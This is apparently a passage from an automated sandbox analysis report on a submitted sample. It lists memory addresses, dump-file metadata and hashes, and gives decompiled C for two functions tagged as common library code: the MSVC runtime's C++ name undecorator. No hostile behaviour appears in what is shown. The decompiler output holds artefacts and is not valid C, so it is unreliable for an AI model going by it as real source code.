                                                                                              0x0136027a
                                                                                              0x00000000
                                                                                              0x0136027a
                                                                                              0x0136024a
                                                                                              0x0136024c
                                                                                              0x01360268
                                                                                              0x01360268
                                                                                              0x00000000
                                                                                              0x01360268
                                                                                              0x0136024e
                                                                                              0x01360250
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360252
                                                                                              0x01360254
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360256
                                                                                              0x01360258
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136025d
                                                                                              0x00000000
                                                                                              0x01360263
                                                                                              0x00000000
                                                                                              0x01360263
                                                                                              0x0136025d
                                                                                              0x01360146
                                                                                              0x0136020b
                                                                                              0x01360212
                                                                                              0x013601bc
                                                                                              0x013601c0
                                                                                              0x013601c3
                                                                                              0x00000000
                                                                                              0x013601c3
                                                                                              0x0136014c
                                                                                              0x0136014c
                                                                                              0x01360152
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360158
                                                                                              0x0136015f
                                                                                              0x00000000
                                                                                              0x01360166
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360185
                                                                                              0x0136018c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360195
                                                                                              0x0136019c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013601a5
                                                                                              0x0136016d
                                                                                              0x0136016d
                                                                                              0x01360174
                                                                                              0x01360178
                                                                                              0x0136017b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013601ae
                                                                                              0x013601b5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013601e7
                                                                                              0x013601e7
                                                                                              0x013601ea
                                                                                              0x013601f2
                                                                                              0x013601f5
                                                                                              0x013601fc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013601cd
                                                                                              0x013601d0
                                                                                              0x013601d8
                                                                                              0x013601db
                                                                                              0x013601e2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360203
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: shared_ptr$operator+$Name::operator+Name::operator=
                                                                                              • String ID:
                                                                                              • API String ID: 1464150960-0
                                                                                              • Opcode ID: f356bc6cbb1e38007190c6dc61147dce5f4ef75a6a4ff7842807a84eed4662a2
                                                                                              • Instruction ID: a957e9bd80726099b236bbadb406efd337b176e038e58d5e34cc0ad05595523a
                                                                                              • Opcode Fuzzy Hash: f356bc6cbb1e38007190c6dc61147dce5f4ef75a6a4ff7842807a84eed4662a2
                                                                                              • Instruction Fuzzy Hash: E4E148B5C0420EDBDF19CF98C58AABEBBBCAB4530CF14C15AE611A6258D7348649CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135C1FB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 186COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 74%
                                                                                              			E0135C1FB(void* __edx, void* __edi, char* _a4, char _a8, char _a12) {
				signed int _v8;
				char _v24;
				char* _v28;
				char* _v32;
				char _v33;
				char _v44;
				char* _v48;
				char _v56;
				char _v64;
				void* __ebx;
				void* __esi;
				signed int _t51;
				char** _t57;
				char* _t58;
				char** _t60;
				char* _t66;
				char** _t78;
				signed int* _t79;
				signed int* _t80;
				char* _t84;
				char _t85;
				signed int* _t113;
				char* _t116;
				signed int* _t118;
				signed int _t119;

				_t115 = __edi;
				_t114 = __edx;
				_t51 =  *0x139e210; // 0x1911783b
				_v8 = _t51 ^ _t119;
				_t84 = _a4;
				_t118 =  *0x13a0b18; // 0x0
				_v48 = _t84;
				_t85 =  *_t118;
				_t54 = _t85 + 0xffffffd0;
				_v33 = _t85;
				if(_t85 + 0xffffffd0 > 9) {
					_push(__edi);
					if(_t85 != 0x3f) {
						if(E0135B5EC(_t118, "template-parameter-", 0x13) != 0) {
							if(E0135B5EC(_t118, "generic-type-", 0xd) != 0) {
								if(_a12 == 0 || _v33 != 0x40) {
									_t57 = E0135B7A6( &_v56, 0x13a0b18, 0x40);
									L20:
									_t84 = _t57[1];
									_t116 =  *_t57;
								} else {
									_t116 = 0;
									_t118 =  &(_t118[0]);
									_t84 = 0;
									 *0x13a0b18 = _t118;
								}
								goto L21;
							}
							_v32 = "`generic-type-";
							_t118 =  &(_t118[3]);
							_v28 = 0xe;
							L9:
							 *0x13a0b18 = _t118;
							E0135D268(_t114,  &_v44);
							if(( *0x13a0b20 & 0x00004000) == 0 ||  *0x13a0b28 == 0) {
								E0135BB4B(E0135B77F( &_v56,  &_v32),  &_v32,  &_v44);
								_t66 =  &_v64;
								goto L14;
							} else {
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								E0135BAA7( &_v44,  &_v24, 0x10);
								_t118 =  *0x13a0b28; // 0x0
								 *0x13a2000(E0138291F(_t114,  &_v24,  &_v24));
								if( *_t118() == 0) {
									E0135BB4B(E0135B77F( &_v64,  &_v32),  &_v32,  &_v44);
									_t66 =  &_v56;
									L14:
									_t57 = E0135BB6D( &_v32, _t66, 0x27);
									goto L20;
								}
								_v28 = 0;
								_push(_v28);
								_t57 = E01361CB8( &_v44, _t73);
								goto L20;
							}
						}
						_v32 = "`template-parameter-";
						_t118 =  &(_t118[4]);
						_v28 = 0x14;
						goto L9;
					} else {
						_t78 = E0135D966(_t84, __edx, __edi, _t118,  &_v44, 0);
						_t116 =  *_t78;
						_t84 = _t78[1];
						_t79 =  *0x13a0b18; // 0x0
						_v32 = _t116;
						_v28 = _t84;
						_t80 =  &(_t79[0]);
						 *0x13a0b18 = _t80;
						if( *_t79 != 0x40) {
							_t81 = _t80 - 1;
							 *0x13a0b18 = _t80 - 1;
							E0135BDFB( &_v32, (0 |  *_t81 != 0x00000000) + 1);
							_t84 = _v28;
							_t116 = _v32;
						}
						L21:
						if(_a8 != 0) {
							_t118 =  *0x13a0b10; // 0x0
							if( *_t118 != 9 && _t116 != 0) {
								_t60 = E0135B660(0x13a0b34, 8);
								if(_t60 != 0) {
									 *_t60 = _t116;
									_t60[1] = _t84;
									 *_t118 =  *_t118 + 1;
									 *(_t118 + 4 +  *_t118 * 4) = _t60;
								}
							}
						}
						_t58 = _v48;
						 *_t58 = _t116;
						_t58[4] = _t84;
						_pop(_t115);
						goto L27;
					}
				} else {
					_t113 =  *0x13a0b10; // 0x0
					 *0x13a0b18 = _t118;
					E0135BF23(_t113, _t84, _t54);
					_t58 = _t84;
					L27:
					return E01353E0D(_t58, _t84, _v8 ^ _t119, _t114, _t115, _t118);
				}
			}




























                                                                                              0x0135c1fb
                                                                                              0x0135c1fb
                                                                                              0x0135c201
                                                                                              0x0135c208
                                                                                              0x0135c20c
                                                                                              0x0135c210
                                                                                              0x0135c216
                                                                                              0x0135c219
                                                                                              0x0135c21e
                                                                                              0x0135c221
                                                                                              0x0135c227
                                                                                              0x0135c244
                                                                                              0x0135c248
                                                                                              0x0135c2ac
                                                                                              0x0135c2d3
                                                                                              0x0135c3a7
                                                                                              0x0135c3c6
                                                                                              0x0135c3cb
                                                                                              0x0135c3cb
                                                                                              0x0135c3ce
                                                                                              0x0135c3af
                                                                                              0x0135c3af
                                                                                              0x0135c3b1
                                                                                              0x0135c3b2
                                                                                              0x0135c3b4
                                                                                              0x0135c3b4
                                                                                              0x00000000
                                                                                              0x0135c3a7
                                                                                              0x0135c2d9
                                                                                              0x0135c2e0
                                                                                              0x0135c2e3
                                                                                              0x0135c2ea
                                                                                              0x0135c2ed
                                                                                              0x0135c2f4
                                                                                              0x0135c304
                                                                                              0x0135c399
                                                                                              0x0135c39e
                                                                                              0x00000000
                                                                                              0x0135c30f
                                                                                              0x0135c314
                                                                                              0x0135c31a
                                                                                              0x0135c31b
                                                                                              0x0135c31c
                                                                                              0x0135c321
                                                                                              0x0135c326
                                                                                              0x0135c339
                                                                                              0x0135c344
                                                                                              0x0135c36e
                                                                                              0x0135c373
                                                                                              0x0135c376
                                                                                              0x0135c37c
                                                                                              0x00000000
                                                                                              0x0135c37c
                                                                                              0x0135c346
                                                                                              0x0135c34d
                                                                                              0x0135c351
                                                                                              0x00000000
                                                                                              0x0135c351
                                                                                              0x0135c304
                                                                                              0x0135c2ae
                                                                                              0x0135c2b5
                                                                                              0x0135c2b8
                                                                                              0x00000000
                                                                                              0x0135c24a
                                                                                              0x0135c250
                                                                                              0x0135c257
                                                                                              0x0135c259
                                                                                              0x0135c25c
                                                                                              0x0135c261
                                                                                              0x0135c264
                                                                                              0x0135c269
                                                                                              0x0135c26a
                                                                                              0x0135c272
                                                                                              0x0135c278
                                                                                              0x0135c27b
                                                                                              0x0135c28a
                                                                                              0x0135c28f
                                                                                              0x0135c292
                                                                                              0x0135c292
                                                                                              0x0135c3d0
                                                                                              0x0135c3d4
                                                                                              0x0135c3d6
                                                                                              0x0135c3df
                                                                                              0x0135c3ec
                                                                                              0x0135c3f3
                                                                                              0x0135c3f5
                                                                                              0x0135c3f7
                                                                                              0x0135c3fa
                                                                                              0x0135c3fe
                                                                                              0x0135c3fe
                                                                                              0x0135c3f3
                                                                                              0x0135c3df
                                                                                              0x0135c402
                                                                                              0x0135c405
                                                                                              0x0135c407
                                                                                              0x0135c40a
                                                                                              0x00000000
                                                                                              0x0135c40a
                                                                                              0x0135c229
                                                                                              0x0135c229
                                                                                              0x0135c232
                                                                                              0x0135c238
                                                                                              0x0135c23d
                                                                                              0x0135c40b
                                                                                              0x0135c418
                                                                                              0x0135c418

                                                                                              APIs
                                                                                              • Replicator::operator[].LIBCMT ref: 0135C238
                                                                                              • DName::operator=.LIBVCRUNTIME ref: 0135C28A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator=Replicator::operator[]
                                                                                              • String ID: @$generic-type-$template-parameter-
                                                                                              • API String ID: 3211817929-1320211309
                                                                                              • Opcode ID: 567abd967fda02663743770fdf9fb7ec588d33bf29b9cb9ae9ae335c968a22db
                                                                                              • Instruction ID: a1d68c6ab17568e4278e2106e3204570f48f7836ad8ebf5231b96754005d89a9
                                                                                              • Opcode Fuzzy Hash: 567abd967fda02663743770fdf9fb7ec588d33bf29b9cb9ae9ae335c968a22db
                                                                                              • Instruction Fuzzy Hash: F361BFB1D0030D9BDB59DFA8D451EEEFBBDAF1870CF444059EA02A7291D7749A05CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135DC76 Relevance: 15.3, APIs: 10, Instructions: 301COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 78%
                                                                                              			E0135DC76(intOrPtr _a4) {
				signed int _v8;
				long _v24;
				signed int _v28;
				wchar_t** _v32;
				char _v36;
				char _v40;
				char _v48;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t65;
				signed int* _t67;
				signed int _t68;
				void* _t69;
				signed int _t76;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t99;
				signed int _t101;
				signed int _t102;
				signed int _t108;
				void* _t110;
				void* _t112;
				void* _t119;
				void* _t122;
				intOrPtr _t126;
				signed int _t152;
				void* _t153;
				void* _t154;
				signed int _t155;
				signed int _t156;
				void* _t157;
				void* _t158;

				_t65 =  *0x139e210; // 0x1911783b
				_v8 = _t65 ^ _t156;
				_t67 =  *0x13a0b18; // 0x0
				_t126 = _a4;
				_t3 =  &(_t67[0]); // 0x1
				_t152 = _t3;
				_t155 =  *_t67;
				_t68 = _t155;
				 *0x13a0b18 = _t152;
				_v28 = _t155;
				_push(_t153);
				_t157 = _t68 - 0x46;
				if(_t157 > 0) {
					_t69 = _t68 - 0x47;
					__eflags = _t69 - 0xf;
					if(_t69 > 0xf) {
						goto L66;
					} else {
						switch( *((intOrPtr*)(( *(_t69 + 0x135e03e) & 0x000000ff) * 4 +  &M0135E01E))) {
							case 0:
								goto L34;
							case 1:
								 &_v32 = E0135E04E(__edx, __edi, __esi,  &_v32);
								__eflags = _v28 - 1;
								if(_v28 > 1) {
									goto L66;
								} else {
									__eax = E0135DC76(__ebx);
									goto L11;
								}
								goto L68;
							case 2:
								_v32 = "nullptr";
								_v28 = 7;
								goto L16;
							case 3:
								 &_v48 = E0135D2B9(__edx,  &_v48, 0);
								_pop(__ecx);
								_pop(__ecx);
								_v32 = "lambda";
								_v28 = 6;
								goto L16;
							case 4:
								goto L66;
							case 5:
								 &_v40 = E0135D268(__edx,  &_v40);
								__eax = 0;
								__edi =  &_v24;
								asm("stosd");
								_pop(__ecx);
								__ecx =  &_v40;
								asm("stosd");
								asm("stosd");
								asm("stosd");
								 &_v24 = E0135BAA7( &_v40,  &_v24, 0x10);
								__eax =  &_v24;
								__eax = E0138291F(__edx, __edi,  &_v24);
								__eflags =  *0x13a0b20 & 0x00004000;
								__esi = __eax;
								if(( *0x13a0b20 & 0x00004000) == 0) {
									L53:
									__esi = __esi & 0x00000fff;
									 &_v24 = swprintf( &_v24, 0x10, "%d", __esi);
									_v36 = 0;
									__eax =  &_v24;
									__ecx =  &_v40;
									_push(_v36);
									E01361CB8(__ecx,  &_v24) = _v28;
									__eax = _v28 - 0x52;
									__eflags = __eax;
									if(__eax == 0) {
										L61:
										_v32 = "`template-type-parameter-";
										goto L60;
									} else {
										__eax = __eax - 1;
										__eax = __eax - 1;
										__eflags = __eax;
										if(__eax == 0) {
											goto L61;
										} else {
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax == 0) {
												_v32 = "`generic-class-parameter-";
												L60:
												_v28 = 0x19;
												goto L58;
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eax != 0) {
													goto L66;
												} else {
													_v32 = "`generic-method-parameter-";
													_v28 = 0x1a;
													L58:
													__eax =  &_v32;
													__ecx =  &_v48;
													__eax = E0135B77F( &_v48,  &_v32);
													 &_v40 =  &_v32;
													__ecx = __eax;
													__eax = E0135BB4B(__ecx,  &_v32,  &_v40);
													_push(0x27);
													goto L47;
												}
											}
										}
									}
								} else {
									__edi =  *0x13a0b28; // 0x0
									__eflags = __edi;
									if(__edi == 0) {
										goto L53;
									} else {
										__eax = __eax & 0x00000fff;
										__ecx = __edi;
										_push(__eax);
										__eax =  *0x13a2000();
										__eax =  *__edi();
										_pop(__ecx);
										__eflags = __eax;
										if(__eax == 0) {
											goto L53;
										} else {
											_v36 = 0;
											__ecx = __ebx;
											_push(_v36);
											__eax = E01361CB8(__ecx, __eax);
										}
									}
								}
								goto L68;
							case 6:
								__ecx = 0;
								 *__ebx = 0;
								 *((intOrPtr*)(__ebx + 4)) = 0;
								goto L68;
						}
					}
				} else {
					if(_t157 == 0) {
						L34:
						_v32 = 0;
						_v28 = 0;
						E0135BE9C( &_v32, 0x7b);
						_t76 = _t155 - 0x48;
						__eflags = _t76;
						if(__eflags == 0) {
							L37:
							_push( &_v40);
							E0135BD24( &_v32, E0135BF5F(_t126, _t152, _t153, _t155, __eflags));
							E0135BBD3( &_v32, 0x2c);
						} else {
							_t93 = _t76 - 1;
							__eflags = _t93;
							if(__eflags == 0) {
								goto L37;
							} else {
								__eflags = _t93 - 1;
								if(__eflags == 0) {
									goto L37;
								}
							}
						}
						_t155 = _t155 - 0x46;
						__eflags = _t155;
						if(_t155 == 0) {
							L44:
							E0135BD24( &_v32, E0135D268(_t152,  &_v40));
							E0135BBD3( &_v32, 0x2c);
							goto L45;
						} else {
							_t155 = _t155 - 1;
							__eflags = _t155;
							if(_t155 == 0) {
								L43:
								E0135BD24( &_v32, E0135D268(_t152,  &_v40));
								E0135BBD3( &_v32, 0x2c);
								goto L44;
							} else {
								_t155 = _t155 - 1;
								__eflags = _t155;
								if(_t155 == 0) {
									L45:
									E0135BD24( &_v32, E0135D268(_t152,  &_v40));
								} else {
									_t155 = _t155 - 1;
									__eflags = _t155;
									if(_t155 == 0) {
										goto L44;
									} else {
										_t155 = _t155 - 1;
										__eflags = _t155;
										if(_t155 == 0) {
											goto L43;
										}
									}
								}
							}
						}
						_push(0x7d);
						L47:
						_push(_t126);
						E0135BB6D( &_v32);
					} else {
						_t158 = _t68 - 0x36;
						if(_t158 > 0) {
							_t95 = _t68 - 0x37;
							__eflags = _t95;
							if(_t95 == 0) {
								E0135D7A1(_t152, _t153, _t155, _t126);
								goto L11;
							} else {
								_t97 = _t95 - 1;
								__eflags = _t97;
								if(_t97 == 0) {
									E0135D848(_t152, _t153, _t126);
									goto L11;
								} else {
									_t99 = _t97 - 9;
									__eflags = _t99;
									if(_t99 == 0) {
										L29:
										E0135D3C7(_t152, _t126, _t155);
										goto L11;
									} else {
										_t101 = _t99 - 1;
										__eflags = _t101;
										if(_t101 == 0) {
											goto L29;
										} else {
											_t102 = _t101 - 1;
											__eflags = _t102;
											if(_t102 == 0) {
												E0135D72D(_t126);
												goto L11;
											} else {
												__eflags = _t102;
												if(__eflags != 0) {
													goto L66;
												} else {
													_push(_t126);
													E0135BF5F(_t126, _t152, _t153, _t155, __eflags);
													goto L11;
												}
											}
										}
									}
								}
							}
						} else {
							if(_t158 == 0) {
								E0135D6BD(_t152, _t153, _t126);
								goto L11;
							} else {
								_t108 = _t68;
								if(_t108 == 0) {
									_t13 = _t152 - 1; // 0x0
									 *0x13a0b18 = _t13;
									_push(1);
									goto L67;
								} else {
									_t110 = _t108 - 0x30;
									if(_t110 == 0) {
										E0135D268(_t152, _t126);
										goto L11;
									} else {
										_t112 = _t110 - 1;
										if(_t112 == 0) {
											__eflags =  *_t152 - 0x40;
											if( *_t152 != 0x40) {
												_v32 = 0;
												_v28 = 0;
												E0135BE9C( &_v32, 0x26);
												_push( &_v40);
												E0135BB4B( &_v32, _t126, E0135BF5F(_t126, _t152, _t153, _t155, __eflags));
											} else {
												_t152 = _t152 + 1;
												__eflags = _t152;
												_v32 = "NULL";
												 *0x13a0b18 = _t152;
												_v28 = 4;
												L16:
												E0135B77F(_t126,  &_v32);
											}
										} else {
											_t119 = _t112 - 1;
											if(_t119 == 0) {
												E0135D485(_t152, _t153, _t155, _t126);
												goto L11;
											} else {
												_t122 = _t119;
												if(_t122 == 0) {
													E0135D60A(_t126);
													goto L11;
												} else {
													if(_t122 != 1) {
														L66:
														_push(2);
														L67:
														E0135B826(_t126);
													} else {
														E0135D655(_t126);
														L11:
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L68:
				_pop(_t154);
				return E01353E0D(_t126, _t126, _v8 ^ _t156, _t152, _t154, _t155);
			}






































                                                                                              0x0135dc7c
                                                                                              0x0135dc83
                                                                                              0x0135dc86
                                                                                              0x0135dc8c
                                                                                              0x0135dc92
                                                                                              0x0135dc92
                                                                                              0x0135dc95
                                                                                              0x0135dc98
                                                                                              0x0135dc9a
                                                                                              0x0135dca0
                                                                                              0x0135dca3
                                                                                              0x0135dca4
                                                                                              0x0135dca7
                                                                                              0x0135dddb
                                                                                              0x0135ddde
                                                                                              0x0135dde1
                                                                                              0x00000000
                                                                                              0x0135dde7
                                                                                              0x0135ddee
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135dfb9
                                                                                              0x0135dfbe
                                                                                              0x0135dfc3
                                                                                              0x00000000
                                                                                              0x0135dfc5
                                                                                              0x0135dfc6
                                                                                              0x00000000
                                                                                              0x0135dfc6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135dfd0
                                                                                              0x0135dfd7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135dfe9
                                                                                              0x0135dfee
                                                                                              0x0135dfef
                                                                                              0x0135dff0
                                                                                              0x0135dff7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135debb
                                                                                              0x0135dec0
                                                                                              0x0135dec2
                                                                                              0x0135dec5
                                                                                              0x0135dec6
                                                                                              0x0135dec9
                                                                                              0x0135decc
                                                                                              0x0135decd
                                                                                              0x0135dece
                                                                                              0x0135ded3
                                                                                              0x0135ded8
                                                                                              0x0135dedc
                                                                                              0x0135dee1
                                                                                              0x0135deeb
                                                                                              0x0135deee
                                                                                              0x0135df23
                                                                                              0x0135df23
                                                                                              0x0135df35
                                                                                              0x0135df3d
                                                                                              0x0135df41
                                                                                              0x0135df44
                                                                                              0x0135df47
                                                                                              0x0135df50
                                                                                              0x0135df53
                                                                                              0x0135df53
                                                                                              0x0135df56
                                                                                              0x0135dfac
                                                                                              0x0135dfac
                                                                                              0x00000000
                                                                                              0x0135df58
                                                                                              0x0135df58
                                                                                              0x0135df59
                                                                                              0x0135df59
                                                                                              0x0135df5c
                                                                                              0x00000000
                                                                                              0x0135df5e
                                                                                              0x0135df5e
                                                                                              0x0135df5e
                                                                                              0x0135df61
                                                                                              0x0135df9c
                                                                                              0x0135dfa3
                                                                                              0x0135dfa3
                                                                                              0x00000000
                                                                                              0x0135df63
                                                                                              0x0135df63
                                                                                              0x0135df63
                                                                                              0x0135df66
                                                                                              0x00000000
                                                                                              0x0135df6c
                                                                                              0x0135df6c
                                                                                              0x0135df73
                                                                                              0x0135df7a
                                                                                              0x0135df7a
                                                                                              0x0135df7e
                                                                                              0x0135df81
                                                                                              0x0135df8a
                                                                                              0x0135df8e
                                                                                              0x0135df90
                                                                                              0x0135df95
                                                                                              0x00000000
                                                                                              0x0135df95
                                                                                              0x0135df66
                                                                                              0x0135df61
                                                                                              0x0135df5c
                                                                                              0x0135def0
                                                                                              0x0135def0
                                                                                              0x0135def6
                                                                                              0x0135def8
                                                                                              0x00000000
                                                                                              0x0135defa
                                                                                              0x0135defa
                                                                                              0x0135deff
                                                                                              0x0135df01
                                                                                              0x0135df02
                                                                                              0x0135df08
                                                                                              0x0135df0a
                                                                                              0x0135df0b
                                                                                              0x0135df0d
                                                                                              0x00000000
                                                                                              0x0135df0f
                                                                                              0x0135df0f
                                                                                              0x0135df13
                                                                                              0x0135df15
                                                                                              0x0135df19
                                                                                              0x0135df19
                                                                                              0x0135df0d
                                                                                              0x0135def8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135deab
                                                                                              0x0135dead
                                                                                              0x0135deaf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135ddee
                                                                                              0x0135dcad
                                                                                              0x0135dcad
                                                                                              0x0135ddf5
                                                                                              0x0135ddf7
                                                                                              0x0135ddfa
                                                                                              0x0135de02
                                                                                              0x0135de09
                                                                                              0x0135de09
                                                                                              0x0135de0c
                                                                                              0x0135de18
                                                                                              0x0135de1b
                                                                                              0x0135de26
                                                                                              0x0135de30
                                                                                              0x0135de0e
                                                                                              0x0135de0e
                                                                                              0x0135de0e
                                                                                              0x0135de11
                                                                                              0x00000000
                                                                                              0x0135de13
                                                                                              0x0135de13
                                                                                              0x0135de16
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135de16
                                                                                              0x0135de11
                                                                                              0x0135de35
                                                                                              0x0135de35
                                                                                              0x0135de38
                                                                                              0x0135de6b
                                                                                              0x0135de79
                                                                                              0x0135de83
                                                                                              0x00000000
                                                                                              0x0135de3a
                                                                                              0x0135de3a
                                                                                              0x0135de3a
                                                                                              0x0135de3d
                                                                                              0x0135de4e
                                                                                              0x0135de5c
                                                                                              0x0135de66
                                                                                              0x00000000
                                                                                              0x0135de3f
                                                                                              0x0135de3f
                                                                                              0x0135de3f
                                                                                              0x0135de42
                                                                                              0x0135de88
                                                                                              0x0135de96
                                                                                              0x0135de44
                                                                                              0x0135de44
                                                                                              0x0135de44
                                                                                              0x0135de47
                                                                                              0x00000000
                                                                                              0x0135de49
                                                                                              0x0135de49
                                                                                              0x0135de49
                                                                                              0x0135de4c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135de4c
                                                                                              0x0135de47
                                                                                              0x0135de42
                                                                                              0x0135de3d
                                                                                              0x0135de9b
                                                                                              0x0135de9d
                                                                                              0x0135de9d
                                                                                              0x0135dea1
                                                                                              0x0135dcb3
                                                                                              0x0135dcb3
                                                                                              0x0135dcb6
                                                                                              0x0135dd7f
                                                                                              0x0135dd7f
                                                                                              0x0135dd82
                                                                                              0x0135ddd1
                                                                                              0x00000000
                                                                                              0x0135dd84
                                                                                              0x0135dd84
                                                                                              0x0135dd84
                                                                                              0x0135dd87
                                                                                              0x0135ddc6
                                                                                              0x00000000
                                                                                              0x0135dd89
                                                                                              0x0135dd89
                                                                                              0x0135dd89
                                                                                              0x0135dd8c
                                                                                              0x0135ddb8
                                                                                              0x0135ddba
                                                                                              0x00000000
                                                                                              0x0135dd8e
                                                                                              0x0135dd8e
                                                                                              0x0135dd8e
                                                                                              0x0135dd91
                                                                                              0x00000000
                                                                                              0x0135dd93
                                                                                              0x0135dd93
                                                                                              0x0135dd93
                                                                                              0x0135dd96
                                                                                              0x0135ddae
                                                                                              0x00000000
                                                                                              0x0135dd98
                                                                                              0x0135dd99
                                                                                              0x0135dd9c
                                                                                              0x00000000
                                                                                              0x0135dda2
                                                                                              0x0135dda2
                                                                                              0x0135dda3
                                                                                              0x00000000
                                                                                              0x0135dda3
                                                                                              0x0135dd9c
                                                                                              0x0135dd96
                                                                                              0x0135dd91
                                                                                              0x0135dd8c
                                                                                              0x0135dd87
                                                                                              0x0135dcbc
                                                                                              0x0135dcbc
                                                                                              0x0135dd75
                                                                                              0x00000000
                                                                                              0x0135dcc2
                                                                                              0x0135dcc4
                                                                                              0x0135dcc6
                                                                                              0x0135dd65
                                                                                              0x0135dd68
                                                                                              0x0135dd6d
                                                                                              0x00000000
                                                                                              0x0135dccc
                                                                                              0x0135dccc
                                                                                              0x0135dccf
                                                                                              0x0135dd5e
                                                                                              0x00000000
                                                                                              0x0135dcd5
                                                                                              0x0135dcd5
                                                                                              0x0135dcd8
                                                                                              0x0135dd0a
                                                                                              0x0135dd0d
                                                                                              0x0135dd34
                                                                                              0x0135dd37
                                                                                              0x0135dd3f
                                                                                              0x0135dd47
                                                                                              0x0135dd53
                                                                                              0x0135dd0f
                                                                                              0x0135dd0f
                                                                                              0x0135dd0f
                                                                                              0x0135dd10
                                                                                              0x0135dd17
                                                                                              0x0135dd1d
                                                                                              0x0135dd24
                                                                                              0x0135dd2a
                                                                                              0x0135dd2a
                                                                                              0x0135dcda
                                                                                              0x0135dcda
                                                                                              0x0135dcdd
                                                                                              0x0135dd03
                                                                                              0x00000000
                                                                                              0x0135dcdf
                                                                                              0x0135dce0
                                                                                              0x0135dce3
                                                                                              0x0135dcfb
                                                                                              0x00000000
                                                                                              0x0135dce5
                                                                                              0x0135dce8
                                                                                              0x0135e003
                                                                                              0x0135e003
                                                                                              0x0135e005
                                                                                              0x0135e007
                                                                                              0x0135dcee
                                                                                              0x0135dcef
                                                                                              0x0135dcf4
                                                                                              0x0135dcf4
                                                                                              0x0135dce8
                                                                                              0x0135dce3
                                                                                              0x0135dcdd
                                                                                              0x0135dcd8
                                                                                              0x0135dccf
                                                                                              0x0135dcc6
                                                                                              0x0135dcbc
                                                                                              0x0135dcb6
                                                                                              0x0135dcad
                                                                                              0x0135e00c
                                                                                              0x0135e011
                                                                                              0x0135e01c

                                                                                              APIs
                                                                                              • DName::operator+.LIBCMT ref: 0135DD53
                                                                                              • UnDecorator::getSignedDimension.LIBCMT ref: 0135DD5E
                                                                                              • UnDecorator::getSignedDimension.LIBCMT ref: 0135DE52
                                                                                              • UnDecorator::getSignedDimension.LIBCMT ref: 0135DE6F
                                                                                              • UnDecorator::getSignedDimension.LIBCMT ref: 0135DE8C
                                                                                              • DName::operator+.LIBCMT ref: 0135DEA1
                                                                                              • UnDecorator::getSignedDimension.LIBCMT ref: 0135DEBB
                                                                                              • swprintf.LIBCMT ref: 0135DF35
                                                                                              • DName::operator+.LIBCMT ref: 0135DF90
                                                                                                • Part of subcall function 0135D655: DName::DName.LIBVCRUNTIME ref: 0135D6B3
                                                                                              • DName::DName.LIBVCRUNTIME ref: 0135E007
                                                                                              Memory Dump Source
